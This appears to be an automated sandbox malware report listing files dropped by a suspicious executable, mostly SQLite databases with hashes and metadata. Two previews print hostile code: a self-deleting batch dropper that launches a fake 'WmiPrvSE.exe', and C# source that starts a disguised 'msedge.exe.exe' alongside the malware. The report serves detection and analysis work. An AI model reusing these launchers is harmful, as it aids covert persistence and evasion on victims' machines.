                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1358696453229276
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.8475592208333753
                                    Encrypted:false
                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                    MD5:BE99679A2B018331EACD3A1B680E3757
                                    SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                    SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                    SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5712781801655107
                                    Encrypted:false
                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:05A60B4620923FD5D53B9204391452AF
                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1358696453229276
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):0.8746135976761988
                                    Encrypted:false
                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c8, 10 symbols, created Sun Aug 25 15:02:01 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1920
                                    Entropy (8bit):4.602889735783849
                                    Encrypted:false
                                    SSDEEP:24:HGzW91LzWcf2HewKGXN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+2cN:5Lztf2dKGXilmuulB+hnqXSfbNtmhj
                                    MD5:41080BCBB0896482B0A60CB2E1B7666A
                                    SHA1:236A9B4B92E721203E273EAB19D35E6416C190A3
                                    SHA-256:23A9A6C0BE26EE3E031674C3BB8041764806B8588F38B509764A182190905C7B
                                    SHA-512:99594D97FFCD1F0A903D1B1CC653B91A4C2253C38A706695B68EDB6DE3ADDA2776C8C5AA95BFA16578FB19BD8C58D66896DC9FDD17AC0BA4332995894080C71F
                                    Malicious:false
                                    Preview:L...iG.f.............debug$S........P...................@..B.rsrc$01................|...........@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RESA6D0.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\Blockcomcrt.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Sun Aug 25 15:02:02 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1948
                                    Entropy (8bit):4.5515934116534
                                    Encrypted:false
                                    SSDEEP:24:H/G9EoO0FUHdfwKGXN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:h0FUyKGXKluOulajfqXSfbNtmhY2Z
                                    MD5:39BECD09C2D5D65A375BE1114034BAA8
                                    SHA1:3FD20B025BFCBEA47A4D75CF30A22D950CB34031
                                    SHA-256:33AFF56A6F727673A30BA2CE53638F60FB080383BCED21E364703F5D73F1F19A
                                    SHA-512:523670E891DAB70EBBA8FAE7FE2A551665630B0BD8666AC8F2739C15CAB7EB09D31F04380A50AAFE1D52AFECD3643039877C0FA9C6503D0BEBE1498D4FE1F13E
                                    Malicious:false
                                    Preview:L...jG.f.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........=....c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RESA8B5.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\Blockcomcrt.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):1.3909341910495931
                                    Encrypted:false
                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5712781801655107
                                    Encrypted:false
                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:05A60B4620923FD5D53B9204391452AF
                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.6732424250451717
                                    Encrypted:false
                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.403856189774723
                                    Encrypted:false
                                    SSDEEP:3:rjVQyL/UWAt:n6KPAt
                                    MD5:B0404773A002D899533A202D4C5D124D
                                    SHA1:3262D264CD14DF29AA4D55792B0588BE0BB69C82
                                    SHA-256:3EA34A03BA585BD62494A4BC5E1E45FE98685447B119A55267BD5D5AB8ECF267
                                    SHA-512:90B9A036E68FFCF41FA40EF66121BE5C608E476CFF0956383952EB3448249DFEB68C8C9B636D565A09D42006C2A3FD10FC4455C7C7D3B5ACB06BD0C3E22CFBA8
                                    Malicious:false
                                    Preview:m3Gep5xq9j2HCRnN3Yqs8gfWG
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):204
                                    Entropy (8bit):5.108169887214229
                                    Encrypted:false
                                    SSDEEP:6:hCijTg3Nou1SV+DE/P0KOZG1CHhJ23f4Wkhn:HTg9uYDE/TLkhn
                                    MD5:494AA271D7A10F2D3BF45DB4B52E1908
                                    SHA1:D7AFF7C75F42AD39E171A6A985F07025A7A16F17
                                    SHA-256:AC4DD3DA40BCE17D93822B470B16A687073FFC94CCEC5B8FD66DD26EA394E0B5
                                    SHA-512:5DF5BF14E4C8DC5A0705CFEC283E3926C11521FE7CD525F1817A3DAD6E230583E877BF4F8A3BCB4DDC9208FD06A63FE0F2D82914F2A47D7EC3B6AFF082BAA585
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Blockcomcrt\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\elmTxMluu5.bat"
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1209886597424439
                                    Encrypted:false
                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):114688
                                    Entropy (8bit):0.9746603542602881
                                    Encrypted:false
                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):49152
                                    Entropy (8bit):0.8180424350137764
                                    Encrypted:false
                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                    MD5:349E6EB110E34A08924D92F6B334801D
                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):0.08235737944063153
                                    Encrypted:false
                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1373607036346451
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Preview:SQLite format 3
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.103465189601646
                                    Encrypted:false
                                    SSDEEP:3:IAGoLo/oWrcn:hIE
                                    MD5:B047811332B414F89FA080E78A21F5C9
                                    SHA1:B1F78C9E5E85E5FC22021C09A320E01FE4E67082
                                    SHA-256:7A259DC31DB6AA6F2B6FFF28EF6E3B8CB6DE6435C3B734CB0B2655B97BE9E2CB
                                    SHA-512:E7C2E5BE081D93D6F44A54C37850FBD827B4DECA05612C444D7DB514D62E2637B1F692BE50AFE5381C2F1646B61358922AD006B12D3C9EC235242EB654478A35
                                    Malicious:false
                                    Preview:ktRecMnMgupurlpAuEsyM3C99
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1373607036346451
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                    Malicious:false
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):420
                                    Entropy (8bit):5.049808837869983
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LCYgG9VNiFkD:JNVQIbSfhWLzIiFkMSfhWLCyVEFkD
                                    MD5:E36B3FFD5A7E48C30E6CEBD40469BAC1
                                    SHA1:704E4AB856F87587E6501460E9C8BA5B7E2A0871
                                    SHA-256:115C29BF901961250F9C23DC9E5984FA2A671DBC1F32044C1C9798C5D24BA7CB
                                    SHA-512:E21B2470F4E86CF9CEAEEB24083A74D9E3E00E11B6EFA7D9CDCBEC4AC2F08D04EFA1D6C05250A3E8ACEFD1363BF0D03EC0F0C80E25560D0093F304F009F53BE2
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"); } catch { } }).Start();. }.}.
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):266
                                    Entropy (8bit):5.103541493321732
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oCHhJ23ffpspKV9n:Hu7L//TRRzscQDZspKbn
                                    MD5:A33B40450053BD024246CA77C5048F78
                                    SHA1:08F49C5EBD7D1C9B60A8CDCB60F1E8C784ED3F9A
                                    SHA-256:0747DDD8515C2DDEA3FC9A10EEE046443C270BAC33344BE894AA8BA687446CDC
                                    SHA-512:27AA2F8EA065F93B4C7B4448ED8E9CAC3C5810242DA2762D46ECC336B1247BFF326869B7466B8A75834E2EAFB211DE9960BBE707494A31DA7C1D1EF0078B8D6D
                                    Malicious:true
